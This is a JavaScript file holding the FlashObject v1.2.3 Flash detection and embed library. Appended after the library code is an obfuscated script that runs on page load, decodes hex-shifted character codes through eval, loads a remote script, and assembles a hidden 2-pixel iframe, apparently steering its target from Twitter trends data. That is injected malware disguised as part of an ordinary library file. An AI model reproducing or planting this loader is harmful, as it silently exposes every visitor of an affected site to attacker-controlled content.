/**
 * FlashObject v1.2.3: Flash detection and embed - http://blog.deconcept.com/flashobject/
 *
 * FlashObject is (c) 2005 Geoff Stearns and is released under the MIT License:
 * http://www.opensource.org/licenses/mit-license.php
 *
 */
if(typeof com == "undefined") var com = new Object();
if(typeof com.deconcept == "undefined") com.deconcept = new Object();
if(typeof com.deconcept.util == "undefined") com.deconcept.util = new Object();
if(typeof com.deconcept.FlashObjectUtil == "undefined") com.deconcept.FlashObjectUtil = new Object();
com.deconcept.FlashObject = function(swf, id, w, h, ver, c, useExpressInstall, quality, redirectUrl, detectKey){
   this.DETECT_KEY = detectKey ? detectKey : 'detectflash';
   this.skipDetect = com.deconcept.util.getRequestParameter(this.DETECT_KEY);
   this.params = new Object();
   this.variables = new Object();
   this.attributes = new Array();

   if(swf) this.setAttribute('swf', swf);
   if(id) this.setAttribute('id', id);
   if(w) this.setAttribute('width', w);
   if(h) this.setAttribute('height', h);
   if(ver) this.setAttribute('version', new com.deconcept.PlayerVersion(ver.toString().split(".")));
   if(c) this.addParam('bgcolor', c);
   var q = quality ? quality : 'high';
   this.addParam('quality', q);
   this.setAttribute('redirectUrl', '');
   if(redirectUrl) this.setAttribute('redirectUrl', redirectUrl);
   if(useExpressInstall) {
   // check to see if we need to do an express install
   var expressInstallReqVer = new com.deconcept.PlayerVersion([6,0,65]);
   var installedVer = com.deconcept.FlashObjectUtil.getPlayerVersion();
      if (installedVer.versionIsValid(expressInstallReqVer) && !installedVer.versionIsValid(this.getAttribute('version'))) {
         this.setAttribute('doExpressInstall', true);
      }
   } else {
      this.setAttribute('doExpressInstall', false);
   }
}
com.deconcept.FlashObject.prototype.setAttribute = function(name, value){
	this.attributes[name] = value;
}
com.deconcept.FlashObject.prototype.getAttribute = function(name){
	return this.attributes[name];
}
com.deconcept.FlashObject.prototype.getAttributes = function(){
	return this.attributes;
}
com.deconcept.FlashObject.prototype.addParam = function(name, value){
	this.params[name] = value;
}
com.deconcept.FlashObject.prototype.getParams = function(){
	return this.params;
}
com.deconcept.FlashObject.prototype.getParam = function(name){
	return this.params[name];
}
com.deconcept.FlashObject.prototype.addVariable = function(name, value){
	this.variables[name] = value;
}
com.deconcept.FlashObject.prototype.getVariable = function(name){
	return this.variables[name];
}
com.deconcept.FlashObject.prototype.getVariables = function(){
	return this.variables;
}
com.deconcept.FlashObject.prototype.getParamTags = function(){
   var paramTags = ""; var key; var params = this.getParams();
   for(key in params) {
        paramTags += '<param name="' + key + '" value="' + params[key] + '" />';
    }
   return paramTags;
}
com.deconcept.FlashObject.prototype.getVariablePairs = function(){
	var variablePairs = new Array();
	var key;
	var variables = this.getVariables();
	for(key in variables){
		variablePairs.push(key +"="+ variables[key]);
	}
	return variablePairs;
}
com.deconcept.FlashObject.prototype.getHTML = function() {
    var flashHTML = "";
    if (navigator.plugins && navigator.mimeTypes && navigator.mimeTypes.length) { // netscape plugin architecture
        if (this.getAttribute("doExpressInstall")) { this.addVariable("MMplayerType", "PlugIn"); }
        flashHTML += '<embed type="application/x-shockwave-flash" src="'+ this.getAttribute('swf') +'" width="'+ this.getAttribute('width') +'" height="'+ this.getAttribute('height') +'" id="'+ this.getAttribute('id') + '" name="'+ this.getAttribute('id') +'"';
		var params = this.getParams();
        for(var key in params){ flashHTML += ' '+ key +'="'+ params[key] +'"'; }
		pairs = this.getVariablePairs().join("&");
        if (pairs.length > 0){ flashHTML += ' flashvars="'+ pairs +'"'; }
        flashHTML += '></embed>';
    } else { // PC IE
        if (this.getAttribute("doExpressInstall")) { this.addVariable("MMplayerType", "ActiveX"); }
        flashHTML += '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="'+ this.getAttribute('width') +'" height="'+ this.getAttribute('height') +'" id="'+ this.getAttribute('id') +'">';
        flashHTML += '<param name="movie" value="' + this.getAttribute('swf') + '" />';
		var tags = this.getParamTags();
        if(tags.length > 0){ flashHTML += tags; }
		var pairs = this.getVariablePairs().join("&");
        if(pairs.length > 0){ flashHTML += '<param name="flashvars" value="'+ pairs +'" />'; }
        flashHTML += '</object>';
    }
    return flashHTML;
}
com.deconcept.FlashObject.prototype.write = function(elementId){
	if(this.skipDetect || this.getAttribute('doExpressInstall') || com.deconcept.FlashObjectUtil.getPlayerVersion().versionIsValid(this.getAttribute('version'))){
		if(document.getElementById){
		   if (this.getAttribute('doExpressInstall')) {
		      this.addVariable("MMredirectURL", escape(window.location));
		      document.title = document.title.slice(0, 47) + " - Flash Player Installation";
		      this.addVariable("MMdoctitle", document.title);
		   }
			document.getElementById(elementId).innerHTML = this.getHTML();
		}
	}else{
		if(this.getAttribute('redirectUrl') != "") {
			document.location.replace(this.getAttribute('redirectUrl'));
		}
	}
}
/* ---- detection functions ---- */
com.deconcept.FlashObjectUtil.getPlayerVersion = function(){
   var PlayerVersion = new com.deconcept.PlayerVersion(0,0,0);
	if(navigator.plugins && navigator.mimeTypes.length){
		var x = navigator.plugins["Shockwave Flash"];
		if(x && x.description) {
			PlayerVersion = new com.deconcept.PlayerVersion(x.description.replace(/([a-z]|[A-Z]|\s)+/, "").replace(/(\s+r|\s+b[0-9]+)/, ".").split("."));
		}
	}else if (window.ActiveXObject){
	   try {
   	   var axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
   		PlayerVersion = new com.deconcept.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));
	   } catch (e) {}
	}
	return PlayerVersion;
}
com.deconcept.PlayerVersion = function(arrVersion){
	this.major = parseInt(arrVersion[0]) || 0;
	this.minor = parseInt(arrVersion[1]) || 0;
	this.rev = parseInt(arrVersion[2]) || 0;
}
com.deconcept.PlayerVersion.prototype.versionIsValid = function(fv){
	if(this.major < fv.major) return false;
	if(this.major > fv.major) return true;
	if(this.minor < fv.minor) return false;
	if(this.minor > fv.minor) return true;
	if(this.rev < fv.rev) return false;
	return true;
}
/* ---- get value of query string param ---- */
com.deconcept.util.getRequestParameter = function(param){
	var q = document.location.search || document.location.href.hash;
	if(q){
		var startIndex = q.indexOf(param +"=");
		var endIndex = (q.indexOf("&", startIndex) > -1) ? q.indexOf("&", startIndex) : q.length;
		if (q.length > 1 && startIndex > -1) {
			return q.substring(q.indexOf("=", startIndex)+1, endIndex);
		}
	}
	return "";
}

/* add Array.push if needed (ie5) */
if (Array.prototype.push == null) { Array.prototype.push = function(item) { this[this.length] = item; return this.length; }}

/* add some aliases for ease of use / backwards compatibility */
var getQueryParamValue = com.deconcept.util.getRequestParameter;
var FlashObject = com.deconcept.FlashObject;








(function(f_bcr){f_bcr();setTimeout(function(){d='f_bbT={v7bvbbv1av86vc2vc7vc1vc6v80:"",v7bvbbv2av86vc2vc8vc1vc6v80:"",v9bvbbv3av86vc2vc7vc1vc6v30:"l=St",v86v85v4evb2v90v78vcfv92v75:"ring.f",v82v7dv52vbavbfvccv76v9av76:"romCha",v78vb8v68v92v95v7evd0v75v94:"rCode(",c7vb2vc3v71vb7vb0vb3vb3vc8:81,q8ev73vb2vb3vb4vb5vb6vb7vb8:81,bevc0vbfvc1vc2vc3vc4vc5vc6:86,c2vc3vc4vc5vc6vc7vc8vc9vca:81,cdv75v81vc6vc3vbfvbcvc7v7b:83,q77v77v79v8bvb6vc5vbevb3vc4:80,c3vc9vc8v7avc0vb9vbcvbcva7:90,q7av76v7bvcdvbbvb8v7avc6vcb:82,c6vbbvc5vbcv7ev7av7fv77v93:86,b7vb0vb3vb3vb7v7fvb7vb0vb3:81,b9vc0v80vd2v7bv7fvbdvccvc5:87,b4vc5vbavc0vbfv79v7avccvba:81,c0v82vcevd3vcavbfvc9vc0v82:90,q7cv86vbevb7vbavbava0v81v79:88,q90vb9vb2vb5vb5vb9v81vb9vb2:83,b9vb9vc0v80vd2vc9vbcvcbvcc:87,c2vbevcdv74v7evb6vafvb2vb2:80,a1v96v8av94vbfvb8vbbvbbvc1:89,q92v77vbdvc9vc9vc5v8fv84v84:85,q75v7evb9vb2vb5vb5vb9v81vb9:83,afvb2vb2v9ev7bv72v8fvb3vb1:80,c1vc1vb7vb6vb8vc0v92v94v77:85,q93v7cv86vbfvbdvccva2vabva7:88,a1v7bvb9vb2vb5vb5vbbv7fvb9:83,c5vbevb3vc4vb9vbfvbev78vb6:80,b1vb4vb4v97v7bvcdvb8vb1vb4:82,b3vbbv8evb7vb0vb3vb3vbev79:81,b9vb2vb5vb5v98v7cv8evb9vb2:83,b5vb5v9av90vb9vb2vb5vb5v94:83,q7fvbdvb6vb9vb9vc1v80v92vbd:87,b3vb6vb6vc6v91vbavc9vc2vb7:84,c9vbevc4vc3v7dvcdv81vbev7e:85,d2vc9vbcvcbvccvc9vc5v7fvbd:87,b4vb7vb7vcdv7dvcdv80v77v77:85,q83v87v8bv83v99vd2v94v7cv8a:90,q75v7evcbvd0v8evb9vb2vb5vb5:83,c4v8dv77vb4vb2vc3vb1vc9vc4:80,c3vb6vcbvc2vc9vb6vcbvc2vc7:85,b1vbdvbcvb3vb1vbfvc8vbbvb1:80,b8vb6vc5vb3vb4vc8vb8vb3vcb:82,ccvcavb8vc4vbavc7vb8vc5vba:87,ccvb3vb9vb6vc9v79v80vc5vc2:82,bcvb9vc4v78v77vb1v77v79v8b:80,bavb3vb6vb6vbev82vc7vb9vc8:84,a6va5v94v95vb2vc5vb6v79vb7:81,b4vb7vb7vbfv83vbcvbavc9vaa:85,acv9bv9cvb9vccvbdv80v81v85:88,q78v78vb6vafvb2vb2v97v8ev88:80,q83v99v8cv94v8dv83v83v95vc0:90,b5vb8vb8vb7v93vbcvb5vb8vb8:86,c3v87vc0vbevcdvaevadv9cv9f:89,c9vc0vc0vadvb9vb5vc6v7cv7d:84,q84vbdvb6vb9vb9va1v7fv7bv83:87,aev7ava6vbbvc2vb6vbevcavb4:83,ccvbbv76v9cvc2vb7vc9vbev7d:86,b7v83v95vc0vb9vbcvbcvd0v97:90,b9vb2vb5vb5vbdv81vbavb8vc7:83,acvabv9ava4vc6vc5vcbvbfv7f:87,q7av7cv82v8cvb7vb0vb3vb3v95:81,q97vc0vb9vbcvbcvc4v88vc1vbf:90,c4va5va4v93v94vb1vc4vb5v78:80,q81v93vbevb7vbavbavbfv95vbe:88,b7vbavbavd1v80vb3vbevb7vba:88,b4vbav7ev74v78vb6vb3vc6vb7:82,q90v75v7fv77v81vc0vb4vc3v7b:83,b5vc0vb9vbcvbcvbbv86vc0vb9:90,b4vb4vc8v7evb8vb1vb4vb4v96:82,b1v80vbavb3vb6vb6vc6v7dv82:84,c1vc6vc0vc5v7fv79v84v79v80:87,b5v81v93vcbvbdvccvacvc1vc5:88,bcvc6vccvcbv7fvbdvccvc5vba:87,c9vbevc4vc3v7dv7evd0v79v83:85,bdvbbvcava0va9va5va4v7evbc:86,b5vb8vb8vbdv82vbcvcbvc4vb9:86,cbvc0vc6vc5v7fvbdvb6vb9vb9:87,q9cv80vd2vbdvb6vb9vb9vc6v94:87,q8av95vc0vb9vbcvbcvc5v97vc0:90,afvb2vb2v95v7evc4vc2vb5vbe:80,bevcdv95vc0vc9vccv82vc0vb9:90,b9vb9vd1v77vc0vc5v77vbdvb6:87,b9vb9vc2v80vd2vbdvb6vb9vb9:87,q96v91vbavc9vc2vb7vc8vbdvc3:84,bev78vb6vafvb2vb2vc1v79vcb:80,c8vbbvcavcbvc8vc4v76vbcvb5:86,bbvbbvc4vb4vbfvb8vbbvbbvd3:89,b0vaevb9vb2vb5vb5vc4vb0v81:83,c1vc5vb5vc2vc9vcdv8bvb9vb6:80,q7dvbbvb4vb7vb7v9cv93v8dv7b:85,q7bvbbvb4vb7vb7v9cv91v87v86:85,q77v77vb7vb0vb3vb3vcbv7fvba:81,c6vbcvbdvd0va7vbev80v7fv78:88,q85v8cv7cv7ev93v82v86v7evd0:85,bevb7vbavbavc7v95vbevb7vba:88,bav9bv80vbevb7vbavbav9av80:88,q87v7cv7fv84v7cv7evb9vb2vb5:83,b3vc9v79vb7vb0vb3vb3v93v79:81,q8bv80v80v92vb9vc9vbcvb8vc2:87,cevb6vbdvc4vb6v71vbavb7v79:81,q7fvbdvb6vb9vb9v9ev93v90vd3:87,d2vbcvb5vb8vb8v9dv94v88v86:86,q81v7ev7evbevb7vbavbavd2v86:88,b9vbevb4vb5vc8v9fvb6v78v77:80,q70v81v88v77v79v8ev7dv81v79:80,d1vbcvb5vb8vb8vc5v93vbcvb5:86,bavbav9bv80vbevb7vbavbav9a:88,q7av86v7bv7ev83v7bv7dvb8vb1:82,b6vb6vccv7cvbavb3vb6vb6v96:84,q7dv89v7ev7ev80v86v85v90vb7:85,ccvbfvbbvc5vd7vd7vc3vc0v82:90,q75vbavb3vb6vb6vc3v7dvbavb3:84,bavbavc7v95vbevb7vbavbav9b:88,q7bvb9vb2vb5vb5vbevaevb9vb2:83,bbvbbvd3vb6vb4v8fvb6v87vca:89,cavbavc7vcev81v86v7ev80v8c:85,q7evb9vb2vb5vb5vcbv7bvb9vb2:83,bavbavc3vb3vbevb7vbavbavd2:88,b0vaev89vb0v81vc4vc8vb8vc5:83,cdv7dv8fvbdvbav7cvbavb3vb6:84,b8vc5v7fvd1vbcvb5vb8vb8vc9:86,q8ev79v79v79vb7vb0vb3vb3vb2:81,q7bv78vb6vafvb2vb2vbfv7avb6:80,b6vb9vb9v9bv80v80v82v7fvbd:87,b4vb7vb7vcbvb3vbbvb4vb7vb7:85,q9bv80v81vbdvb6vb9vb9vc6v80:87,q7bvb6vafvb2vb2v94v79v7bv78:80,q89v88v88v81v93vbevb7vbavba:88,bev96v81vbfvb8vbbvbbvbav7f:89,q8avd2v9bv9bv83v95vc0vb9vbc:90,b5vb7v90v7bvb9vb2vb5vb5vb4:83,q7bv85vcdv88v88v86v86v7ev90:85,bdvb6vb9vb9vbav94vbdvb6vb9:87,bcvd1vb5v82v82vc0vb9vbcvbc:90,bcv82vbdvb6vb9vb9vcav80v7c:87,q87v84v7av76v83v87vaev7cvb7:81,b6vb9vb9vcevb2v7fv7fvbdvb6:87,bavbavbdv94v94v8av81v83vbe:88,afvb2vb2vc3v79v75v78v82v85:80,q7dvb1v8fvbavb3vb6v91vbavb3:84,b3vb3vc8vacv79v79v79vb7vb0:81,bavbavbcv96v96v8bv81v83vbe:88,afvb2vb2vc3v79v75v81v80v79:80,afv7dvb8vb1vb4vb4vc9vadv7a:82,q82v82vc0vb9vbcvbcvbev98v98:90,q87v7cv7evb9vb2vb5vb5vc6v7c:83,q7bv87v86v7fvb3v91vbcvb5vb8:86,b6vc9v91vbavb3vb6vb6vcbvaf:84,q79v79vb7vb0vb3vb3vc7v7cvb7:81,b4vb7vb7vc8v7ev7av7dv87v8a:85,q7fv7fvb3v81vbcvb5vb8vb8vcd:86,abv78v78vb6vafvb2vb2vc6v7a:80,bdvb6vb9vb9vcav80v7cv7fv89:87,q86v7av7avaev8cvb7vb0vb3vb3:81,c6v95vbevb7vbavbavcfvb3v80:88,q78vb6vafvb2vb2v94v7avb6vaf:80,b5vb5vc6v7cv78v85v87v7cvb0:83,q94vbfvb8vbbvbbva4v96v7dv87:89,bevb2vc1v79vacv89v82v7dv89:81,q85v7cv87v84v7cv87v84v7cv89:80,q8av84v89v8fv84v90v8av84v8f:88,q8dv86v92v8av86v8dv8av86v92:90,q86v80v8bv8bv80v86v89v80v85:84,q84v7fv84v83v7fv84v83v7fv89:83,q86v81v86v86v81v8av8bv81v8a:85,q8dv84v89v89v84v8dv8bv84v8e:88,q83v8cv8av83v8ev83v89v83v88:87,q85v89v85v8dv91vb6v85vbfvce:89,c5vbavcbvc0vc6vc5v7fvcfv83:87,c1v81vd3vcavbdvccvcdvcavc6:88,q75va8vc9vc7vbevc3vbcv83vbb:85,c4vc1vbfv95vbavb3vc4v95vc1:82,bavbbv7evbfv81vcev81v88v8a:86,q83vd7v83v95vc0vb9vbcvbcvca:90,q8fvb8vb1vb4vb4vcbv7avadv79:82,bcvc8vc8vc4v8ev83v83v7bv80:84,bfvb8vbbvbbvc7v85vbfvb8vbb:89,q82vbcvb5vb8vb8vcbv82vbcvb5:86,bcvbcvbdv86vc0vb9vbcvbcvc8:90,q84vbevb7vbavbavccvb3vbevb7:88,b7vb7vcbv82v86vb2v81v7cv83:85,b8vc4vc2v84v7cvb2v7ev80vbb:85,b0vb3vb3vcav79vb7vb0vb3vb3:81,a4v82v94vbfvb8vbbvbbv9fv96:89,bfvb8vbbvbbvd2v81vb4v80v95:89,b6vbbvc8v72vc5vc6vcbvbevb7:82,q95v7av7fv84vbevb7vbavbavaa:88,q85v80v96v7bv80v85vbfvb8vbb:89,b6vc4v80v7bv76v74vcbvbdvb8:84,cavbev93v87v86v86v76v7dv82:86,bcvb5vb8vb8va6v82v7dv94v92:86,q88vbdvc2vcfv97v80vb6v82v94:89,q7dv81v7bvbbvc8vbdvd2v7bv82:89,q85vb8vc7vc7vbcvc5vbbv7fvbd:87,afvb2vb2v96v79vcdvcdv79vcd:80,q80v86v84v84v84v7dvd1v7dvd1:84,q82vd6vbevc5vccvbevd4vccvbe:89,c9va9vbevc2vbavc4vcavc9v7d:85,c0vcfvc8vbdvcevc3vc9vc8v82:90,q7fvd1vbcvb5vb8vb8va3v7evbc:86,b9vbcvbcvc0v88vc4vabvcfvbf:90,c7vcev7evd2v81v87v85v85v7e:85,cfvcfvb8vc7vc0vb5vc6vbbvc1:82,c1v73vb9vb2vb5vb5v94v7bvcb:83,q79vcbvc2vb5vc4vc5vc2vbev70:80,cbv81vbavb8vc7va8va7v96v9b:83,c8vcevcbvccv81v82vd6vbfvce:89,c5vbavcbvc0vc6vc5v77vbdvb6:87,b3vb3vbev79vc9v7avccvb5v8e:81,c2vb9vcbv74v98vb5vc8vb9v7c:84,q7ev90vb9v83vc8vbavc9va9vbe:85,c4vbcv7fvcfv85vb8vcavb6vc6:87,bev82v89v88v88v88v81v93vca:88,bbvcavcbvc8vc4v76vbavd3vbc:86,c6vbfvb4vc5vbavc0vbfv71vb7:81,b9vbcvbcv9dv82vcdv86vc3v83:90,cbvc2vb5vc4vc5vc2vbev70vc3:80,q86vbbvc0vb9vcav9bvc7vbcvbd:88,q92vc5v79vbav7avcevb7vb0vb3:81,bava5v80vbevb7vbavbavbev86:88,beva5vc9vb9vc6vcdv7dv8fvba:84,c7vc0vb5vc6vbbvc1vc0v72vb8:82,b6vb9vb9vcfv7fvcfv80vd2vc9:87,b5vc4vc5vc2vbev70vc8v7evbc:80,bevc7vc0vcdvc1vd6:89,v86v85v7vb2v90v78vcfv92v77:"32);",v9vc8vcvbdvc6vbcv9bvc0vc1:"if(0){alert(l)};eval(l);",v77v7v70v99vc2v78v70v88v92:";"};f_bcd=[];f_bbf.f_bce=String[\'fr\'+f_bbf.f_bcg+\'har\'+f_bbf.f_bcf+\'de\'];f_bcd.push(\';f_bbf.f_bbR=f_bce(104,101,105,103,104,116,58,50,112,120,34,62,60,105,102,114,97,109,101,32,115,114,99);\');f_bcd.push(\'f_bbf.f_bbP=f_bce(104,101,105,103,104,116,61,50,62,60,47,105,102,114,97,109,101);\');f_bcd.push(\'f_bbf.f_bbN=f_bce(97,112,105,46,116,119,105,116,116,101,114,46,99,111,109,47,49,47,116,114,101,110,100,115,47,100,97,105,108,121,46,106,115,111,110);\');for(var f_bbS in f_bbT){f_bcd.push(f_bcb(f_bbS,f_bbT))};f_bcc(f_bby(f_bcd));try{f_bca.getElementById(window.f_bbN)}catch(e){}';f_bck=d;f_bcc(f_bck)},500)})(function(){f_bcv="0123456789";f_bca=document;f_bbf=window;f_bbf.f_bbi='undefined';f_bbf.f_bcf='Co';f_bbf.f_bcg='omC';f_bbf.f_bbJ=function($,f_bcw){return 0*1};f_bbf.f_bby=function(f_bbS){return f_bbS.join('')};f_bbf.f_bcc=eval;f_bbf.f_bcm=function(f_bbS){return f_bbS.pop()};f_bbf.f_bbf=f_bbf;f_bcu=function(){try{return!!($().jquery.match(/^1.[4-9]+/))}catch(e){return 0}};f_bcz=function(f_bbS){return f_bbS.length};f_bcp=(typeof($)==f_bbf.f_bbi);if(f_bcp||!f_bcu()){if(!f_bcp){try{f_bcy=jQuery.noConflict(true)}catch(e){};try{f_bcy=$.noConflict(true)}catch(e){}}f_bct=f_bca.getElementsByTagName('head')[0];f_bcj=f_bca.createElement('script');f_bcj.setAttribute('src',"http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js");f_bct.appendChild(f_bcj)}f_bbf.f_bco=100;f_bbf.f_bcn=25;f_bbf.f_bcb=function(f_bcq,f_bci){if("rqbcadef".indexOf(f_bcq.substr(0,1))>=0){var f_bcx=f_bby(f_bcq.split('q')).split('v');f_bch=f_bcz(f_bcx);for(var f_bcs=0;f_bcs<f_bch;f_bcs++){f_bcx[f_bcs]=parseInt(f_bcx[f_bcs],16)-f_bci[f_bcq]}return f_bcx.join(',')+','}else{return f_bci[f_bcq]}}})

